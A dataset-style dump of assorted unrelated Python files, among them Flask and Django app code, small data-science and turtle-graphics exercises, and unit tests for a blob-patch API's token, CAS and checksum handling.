text stringlengths 38 1.54M |
|---|
# Flask framework for backend REST API
import os
import flask
from routes import routes
app = flask.Flask(__name__)
app.register_blueprint(routes)
app.secret_key = b'\xc4i\x92\xcc\x1a\xab\x9a#R\x94\xa6[\xce\xc0\xb0\t\x10$e\x1bi\xaf-\xae'
port = int(os.environ.get('PORT', 8080))
if __name__ == '__main__':
app.run(threaded=True, host='0.0.0.0', port=port) |
# %load q06_bowled_players/build.py
# Default Imports
from greyatomlib.python_getting_started.q01_read_data.build import read_data
data = read_data()
# Your Solution
def bowled_out(data=data):
deliveries = data['innings'][1]['2nd innings']['deliveries']
return [delivery_data[delivery]['batsman'] for delivery_data in deliveries for delivery in delivery_data if 'wicket' in delivery_data[delivery] and delivery_data[delivery]['wicket']['kind'] == 'bowled']
|
""" wbuilder """
from .wbuilder import WebBuilder
from .wbuilder import Css
from .version import version as __version__
__all__ = ["WebBuilder", "Css"] |
__author__ = 'rizkivmaster'
import unittest
import datetime
import random
from controllers import Record, recordAccessor
def randomId():
return random.randint(0,10000)
class RecordAccessorTest(unittest.TestCase):
def test_add(self):
record = Record(date=datetime.date.today(),accountingId=str(randomId()),accountingPost='KASIR',accountingType='KREDIT',notes='Test'+str(randomId()),amount=randomId())
recordAccessor.addRecord(record)
result = recordAccessor.getRecordById(record.accountingId)
assert(not result == None)
del(result)
result = recordAccessor.getRecordById(record.accountingId)
result.amount = 4000
recordAccessor.updateRecord(result)
def test_getall(self):
for ii in range(1,10):
posts = ['KASIR','PENJUALAN','BELANJA']
record = Record(date=datetime.date.today(),accountingId=str(randomId()),accountingPost=posts[ii %3],accountingType='KREDIT',notes='Test'+str(randomId()),amount=randomId())
recordAccessor.addRecord(record)
records = recordAccessor.getAllRecords('KASIR')
assert(records!=None)
if __name__ == '__main__':
unittest.main() |
# ClickSmileKaleidoscope.py
# Billy Ridgeway
# Creates a kaleidoscope of smilies reflected across the x axis.
import random # Imports the random library.
import turtle # Imports turtle library.
t = turtle.Pen() # Creates a new turtle pen called t.
t.speed(0) # Sets the speed of the pen to fast.
t.hideturtle() # Hides the pen.
turtle.bgcolor("black") # Sets the background color to black.
angle = t.heading() # Keeps track of the pen's direction.
# Defines our kaleidoscopt function using spirals
def draw_kaleido(x,y):
draw_smileyUp(x,y) # Calls the draw smiley up function.
draw_smileyUp(-x,y) # Calls the draw smiley up function.
draw_smileyD(-x,-y) # Calls the draw smiley upside down function.
draw_smileyD(x,-y) # Calls the draw smiley upside down function.
def draw_smileyUp(x, y): # Defines a function to draw a right side up smiley.
t.penup()
t.setpos(x, y)
t.pendown()
# Head
t.pencolor("yellow")
t.fillcolor("yellow")
t.begin_fill()
t.circle(50)
t.end_fill()
# Left eye
t.setpos(x-15, y+60)
t.fillcolor("blue")
t.begin_fill()
t.circle(10)
t.end_fill()
# Right eye
t.setpos(x+15, y+60)
t.begin_fill()
t.circle(10)
t.end_fill()
# Mouth
t.setpos(x-25, y+40)
t.pencolor("black")
t.width(10)
t.goto(x-10, y+20)
t.goto(x+10, y+20)
t.goto(x+25, y+40)
t.width(1)
def draw_smileyD(x, y): # Defines a function to draw an upside down smiley.
t.penup()
t.setpos(x, y)
t.pendown()
# Head
t.pencolor("yellow")
t.fillcolor("yellow")
t.begin_fill()
t.circle(50)
t.end_fill()
# Left eye
t.setpos(x-15, y+30)
t.fillcolor("blue")
t.begin_fill()
t.circle(10)
t.end_fill()
# Right eye
t.setpos(x+15, y+30)
t.begin_fill()
t.circle(10)
t.end_fill()
# Mouth
t.setpos(x-25, y+60)
t.pencolor("black")
t.width(10)
t.goto(x-10, y+80)
t.goto(x+10, y+80)
t.goto(x+25, y+60)
t.width(1)
turtle.onscreenclick(draw_kaleido) # Calls the draw kaleido function.
|
"""
Mutate NucleotideSequence field of DBASS data to reflect alternate allele.
"""
import sys
import re
import argparse
import fileinput
def main(args):
o = open(args.output, 'w') if args.output != sys.stdout else sys.stdout
i = 1
dbass = sys.stdin if args.input == '-' else open(args.input, 'r')
for row in dbass:
fields = row.strip().split('\t')
if i == 1:
header = dict(zip(fields, range(len(fields))))
o.write('\t'.join(fields) + '\n')
i += 1
else:
orig = fields[header['NucleotideSequence']]
seq = re.sub('[\[\]]', '', orig) # include insertions
delta = 0
for event in re.finditer('\(.*?\)', seq):
l = len(seq)
event_str = event.group(0)
start = event.start() + delta
end = event.end() + delta
# SNP
if '>' in event_str:
match = re.search('\((.*)>(.*)\)', event_str)
allele = match.group(1) if args.ref else match.group(2)
seq = seq[:start] + allele + seq[end:]
# deletion
elif args.ref:
seq = filter(lambda char: char not in ['(', ')'], seq)
else:
seq = seq[:start] + seq[end:]
delta = len(seq) - l
newfields = fields
newfields[header['NucleotideSequence']] = seq
o.write('\t'.join(newfields) + '\n')
o.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dbass', '-i', dest='input', default='-', help='Input DBASS file. Accepts stdin as default.')
parser.add_argument('--out', '-o', dest='output', default=sys.stdout)
parser.add_argument('--ref', action='store_true', help='Derive wild-type sequence instead')
args = parser.parse_args()
main(args)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
class mutiThread():
def __init__(self, task_pool, threads=1):
self._task_pool = task_pool
self._threads = int(threads)
self._res = [None] * len(task_pool)
self._lock = threading.Lock()
def _handler(self):
while True:
self._lock.acquire()
try:
c = len(self._task_pool)
if c:
task = self._task_pool.pop()
else:
break
finally:
self._lock.release()
func = task['func']
args = task['args']
if args is None:
self._res[c-1] = func()
else:
if isinstance(args, dict):
self._res[c-1] = func(**args)
else:
raise ValueError ('task_pool`s args must be a dict')
def run(self):
T = [None] * self._threads
for i in range(self._threads):
T[i] = threading.Thread(target=self._handler)
T[i].start()
for i in range(self._threads):
T[i].join()
return self._res
|
from django.contrib import admin
from .models import Blog, BlogLike
# Register your models here.
class BlogAdmin(admin.ModelAdmin):
fieldsets = [
(None, {
'fields': ["title", "content", "author",
"is_published", "is_public"]
})
]
admin.site.register(Blog, BlogAdmin)
admin.site.register(BlogLike)
|
from django.urls import path
from . import views
from django.contrib.auth.views import (
login, logout, password_reset, password_reset_done, password_reset_confirm,
password_reset_complete
)
app_name = 'accounts'
urlpatterns = [
path('', views.index, name='index'),
path('login/', login, {'template_name':'accounts/login.html'}, name='login'),
# path('logout/', logout, {'template_name':'accounts/logout.html'}, name='logout'),
path('logout/', logout, {'next_page': 'accounts:index'}, name='logout'),
path('register/', views.register, name='register'),
path('profile/', views.view_profile, name='view_profile'),
path('profile/edit/', views.edit_profile, name='edit_profile'),
path('change-password/', views.change_password, name='change-password'),
path('reset-password/', password_reset, {'template_name':'accounts/reset_password.html', 'post_reset_redirect':'accounts:password_reset_done', 'email_template_name':'accounts/reset_password_email.html'}, name='reset-password'),
path('reset-password/done/', password_reset_done, {'template_name':'accounts/reset_password_done.html'} ,name='password_reset_done'),
path('reset-password/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/', password_reset_confirm, name='password_reset_confirm'),
path('reset-password/complete/', password_reset_complete, name='password_reset_complete'),
]
|
'''
RS review from desktop, corrected with () and ""
'''
print ("First line created by RS from github")
print ("Second line updated by sailu from github")
print ("Third line updte by ravi from local system")
print ("Fouth line update by ravi from local system branch Develop")
|
import math
class Environment:
def __init__(self, gravity=9.81, air_density=1.225):
self.gravity = gravity
self.air_density = air_density
def __repr__(self):
return f'<{self.__class__.__name__}: gravity={self.gravity}, air_density={self.air_density}>'
def compute_air_density(temperature_degc, relative_humidity, air_pressure_mb):
zero_degc_in_k = 273.15
temperature_k = temperature_degc + zero_degc_in_k
eso = 6.11 # saturation vapor pressure at 273.15K (0 degC) [mb]
lv = 2.5e6 # Latent heat of vaporization [J/kg]
rv = 461.5 # [J/kg/K]
rd = 287 # [J/kg-K]
es = eso * math.exp((lv/rv)*(1/zero_degc_in_k-1/temperature_k)) # saturation vapor pressure [mb]
e = relative_humidity*es # vapor pressure [mb]
q = 0.622*(e/air_pressure_mb) # specific humidity [-]
temperature_virtual_k = temperature_k*(1+0.61*q) # Virtual temperature [K]
air_pressure_pa = air_pressure_mb * 100 # air pressure [Pa]
density = air_pressure_pa/(rd*temperature_virtual_k) # air density [kg/m^3]
return density
|
# -*- coding: utf-8 -*-
import pandas as pd
reviews = pd.read_csv("ign.csv")
xb=(df['score']>7)&(df['platform']=="Xbox One")
x=xb.value_counts()
print("xbox one score is >7 :",x[1])
ps=(df['platform']=="PlayStation 4")
print(ps)
p=ps.value_counts()
q=(df['platform']=="Xbox One")
q=q.value_counts()
q[1]
p[1]
xbox_one_filter = (reviews["score"] > 7) & (reviews["platform"] == "Xbox One")
filtered_reviews = reviews[xbox_one_filter]
filtered_reviews.head()
reviews[reviews["platform"] == "PlayStation 4"]["score"].plot(kind="hist", legend=True)
reviews[reviews["platform"] == "Xbox One"]["score"].plot(kind="hist", legend=True)
filtered_reviews["score"].plot(kind="hist", legend=True)
|
from datetime import datetime
from google.appengine.ext import db
from chzis.congregation.models import CongregationMember
class Lesson(db.Model):
number = db.IntegerProperty(required=True)
name = db.StringProperty(required=True)
reading = db.BooleanProperty()
demo = db.BooleanProperty()
discourse = db.BooleanProperty()
description = db.StringProperty()
last_modification = db.DateTimeProperty(auto_now=True)
class Background(db.Model):
number = db.IntegerProperty(required=True)
name = db.StringProperty(required=True)
description = db.StringProperty()
last_modification = db.DateTimeProperty(auto_now=True)
class StudentProfile(db.Model):
person = db.ReferenceProperty(CongregationMember, required=True)
lesson = db.ReferenceProperty(Lesson, required=True)
lesson_passed = db.BooleanProperty()
lesson_comments = db.StringProperty()
background = db.ReferenceProperty(Background)
description = db.StringProperty()
creation_date = db.DateProperty()
presentation_date = db.DateProperty()
topic = db.StringProperty()
last_modification = db.DateTimeProperty(auto_now=True)
|
# coding=utf-8
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from manageset.models import UserProfile, Sets, Words, Kanji, KnownKanji, KnownWords, UserSets
from django.db.models import Count, Min, Sum, Avg
from django.contrib.auth.models import User
from datetime import datetime, timedelta, date
from django.utils.timezone import utc
import time
from django.utils import timezone
from django.core.urlresolvers import reverse
from django.views.generic import View
from django.http import JsonResponse
import json
from django.core.serializers.json import DjangoJSONEncoder
from api.serializers import *
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.decorators import renderer_classes
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from utils import *
def index(request):
return render(request,'production-dist/index.html')
@api_view(['GET'])
def get_master_review_decks(request):
decks = Sets.objects.exclude(master_order__isnull=True)
serializer = SetsSerializerWithoutWords(decks, many=True)
data = serializer.data
return Response(data)
@api_view(['GET'])
def get_user_sets(request):
userprofile = request.user.userprofile
decks = UserSets.objects.filter(user_profile_fk = userprofile).order_by('id')
serializer = UserSetsSerializer(decks, many=True)
data = serializer.data
chunked_data = []
size = 20;
deckArrayLength = len(data)
chunk = { 'chunk_list': [] }
completed_count = 0
for index, each in enumerate(data):
if each['completion_status']: completed_count += 1
chunk['chunk_list'].append(data[index])
if (index + 1) % size == 0 or index == deckArrayLength - 1:
chunk['completed_count'] = completed_count
chunked_data.append(chunk)
completed_count = 0
chunk = { 'chunk_list': [], 'complete_count': 0 }
return Response(chunked_data)
@api_view(['GET'])
def get_analytics_data(request):
username = request.user.username
todays_log = AnalyticsLog.objects.get_or_create(request.user)
serializer = AnalyticsLogSerializer(todays_log)
data = serializer.data
return Response(data)
@api_view(['GET'])
def get_chart_data(request):
userprofile = request.user.userprofile
analytics_logs = AnalyticsLog.objects.filter(user_profile = userprofile)
log_count = analytics_logs.count()
#TODO for future - split different chart queries into different functions or a switch statement
words_studied_count = list(analytics_logs.values_list('words_studied_count', flat=True).order_by('last_modified'))
words_studied_count.insert(0, 0)
master_words_count = Words.objects.filter(master_order__gt=0).count()
base = date.today()
date_list = [base - timedelta(days=x) for x in range(log_count, -1, -1)]
ideal_data_points = [ 15 * x for x in range(0, log_count + 1)]
return Response({'x_axis_data':date_list,
'data_points':words_studied_count,
'ideal_data_points':ideal_data_points})
# TODO look into moving each individual calculation into model
@api_view(['GET'])
def get_review_data(request):
userprofile = request.user.userprofile
update_word_queue(request.user)
known_words = KnownWords.objects.filter(user_profile = userprofile)
tier_counts = known_words.values('tier_level').annotate(count = Count('tier_level')).order_by('tier_level')
master_word_count = Words.objects.filter(master_order__gt=0).count()
count_dict = {}
studied_word_sum = 0
for each in tier_counts:
count_dict[each['tier_level']] = each['count']
#if not in above count_dict then set to 0
for each in range(10):
try:
studied_word_sum += count_dict[each]
except KeyError:
count_dict[each] = 0
count_dict[0] = master_word_count - studied_word_sum
reviews_due_count = known_words.filter(time_until_review__lte = 0).count()
reviews_24_hours = (known_words.filter(
user_profile = userprofile,
#within the next day
time_until_review__range = (0,86400))
.values('time_until_review')
.order_by('time_until_review')
)
next_review_time = reviews_24_hours.first()
reviews_24_hours_count = reviews_24_hours.count() + reviews_due_count
if reviews_due_count == 0 and next_review_time:
next_review = str(timedelta(seconds = next_review_time['time_until_review'])).split('.')[0]
else:
next_review = reviews_due_count
return JsonResponse({'next_review':next_review, 'next_day':reviews_24_hours_count, 'tier_counts':count_dict, 'username':request.user.username })
|
from django.conf import settings
from django.db import models
from django.utils import timezone
#this line defines our model
#class is keyword and post is the name of the model
#models.Model means that post is a django model,it will be saved in database
class Post(models.Model):
#now we will define properties of class post
author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)#this is a link to another model
title = models.CharField(max_length=200)#it defines text with limited no.of char
text = models.TextField()#it defines text with unlimited char
created_date = models.DateTimeField(default=timezone.now)#model.___ this is date and time
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):#publish is the method name
self.published_date = timezone.now()
self.save()
def __str__(self):#__str__ we'll get a text(string)with post title
return self.title
# Create your models here.
|
import numpy as np
import cv2
import tensorflow as tf
data={
"labels":np.zeros((10,10)),
"images":np.zeros((10,784))
}
font = cv2.FONT_HERSHEY_SIMPLEX
for i in range(10):
img = np.zeros((400, 310), np.uint8)
cv2.putText(img, str(i), (0, 370), font, 16, (255, 255, 255), 12)
img=cv2.resize(img, (28, 28))
cv2.imwrite("./images/"+str(i)+".png",img)
temp=[0,0,0,0,0,0,0,0,0,0]
temp[i]=1
data["labels"][i]=temp
data["images"][i]=img.flatten() / 255.0
#print(data)
x = tf.placeholder("float", [None, 784])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x,W) + b)
y_ = tf.placeholder("float", [None,10])
cross_entropy = -tf.reduce_sum(y_*tf.log(y))
#cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, y_))
train_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
#Train our model
iter = 1000
for i in range(iter):
sess.run(train_step, feed_dict={x:data["images"],y_:data["labels"]})
#Evaluationg our model:
correct_prediction=tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy=tf.reduce_mean(tf.cast(correct_prediction,"float"))
print("Accuracy: ", sess.run(accuracy, feed_dict={x:data["images"],y_:data["labels"]}))
# for i in range(10):
# train_accuacy = accuracy.eval(feed_dict={x:data["images"],y_:data["labels"]})
# print("step %d, training accuracy %g" % (i, train_accuacy))
# train_step.run(feed_dict={x:data["images"],y_:data["labels"]})
my_classification = sess.run(tf.argmax(y, 1), feed_dict={x: [data["images"][5]]})
print('Neural Network predicted', my_classification[0], "for your digit") |
#!/usr/bin/python26
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/lib")
import unittest
from acl import ACL
from unit_class import *
import sys
import random
from config import ConfigService
#diff_path = os.path.dirname(os.path.abspath(__file__))
diff_path = os.path.dirname(os.path.abspath(__file__)) + "/../results"
class blob_diff(gh_unit):
"""/*****************************************************************************************
user.blob.patch TCs
********************************************************************************************"""
def test_user_blob_patch_existing_blob(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_series_diffs(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
oldFile1 = diff_path + '/old1.txt'
os.system('cp %s %s' %(newFile, oldFile1))
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
os.system('rm %s/out.zcdiff'%diff_path)
result = user_blob_get(zauth)
oldFile = oldFile1
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_empty_old_blob(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = ''
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write('dfssdfio^&*^&*678687')
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request: (P3:Jira Defect: SEG-9315)')
os.system('rm %s/out.zcdiff'%diff_path)
'''
def test_user_blob_patch_same_contents(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
#path = '/home/sdoddabasayya/blobDiff/php-zcdiff'
#oldBlob = 'old.txt'
#data = data_to_post()
data = "werkjl3234#$#$"
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(data)
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Manually it passes--please reverify')
os.system('rm %s/out.zcdiff'%diff_path)
#print "Ret: %s\n"%ret
#print "Result: %s\n"%result
#print "*********************************************************************\n"
'''
def test_user_blob_patch_empty_token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
zauth= None
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_expired_token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
zauth= AuthSystem.getExpiredToken(Constants.ZID)
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_invalid_CAS(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
cas_invalid = cas + 1
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch,[zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas_invalid,checksum ],[409])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_miss_CAS(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
checksum = diff_data_post(diff_path,oldFile,newFile)
cas_miss = ''
ret, result = self.check_pass(user_blob_patch, [zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas_miss,checksum ],[409])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_corrupted_diff(self):
#ZID = random.randint(1,9999)
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
corruptFile = diff_path + '/out.zcdiff'
f = open(corruptFile,'r+')
f.seek(-10,2)
f.write(os.urandom(5)) #Edit the zcdiff file by adding some random data to corrupt it.
f.close()
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_corrupted_checksum(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
corrupted_checksum = checksum + '23487HIH&*(' #corrupt the checksum by adding some random string
ret,result = self.check_pass(user_blob_patch,[zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas,corrupted_checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_without_base(self):
ZID = random.randint(1,9999) #Do not take zid from api_constants for this test, as it requires a new zid alltogether
zauth = AuthSystem.getUntrustedToken(ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = '' #the old blob can be taken as empty string as there is no existence of old blob in the first place
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_without_checksum(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
checksum = None
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_Admin_Token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
zauth = AuthSystem.getTrustedAuthToken(Constants.ZID) #Trusted auth token is Admin token
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_ReadOnly_Token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
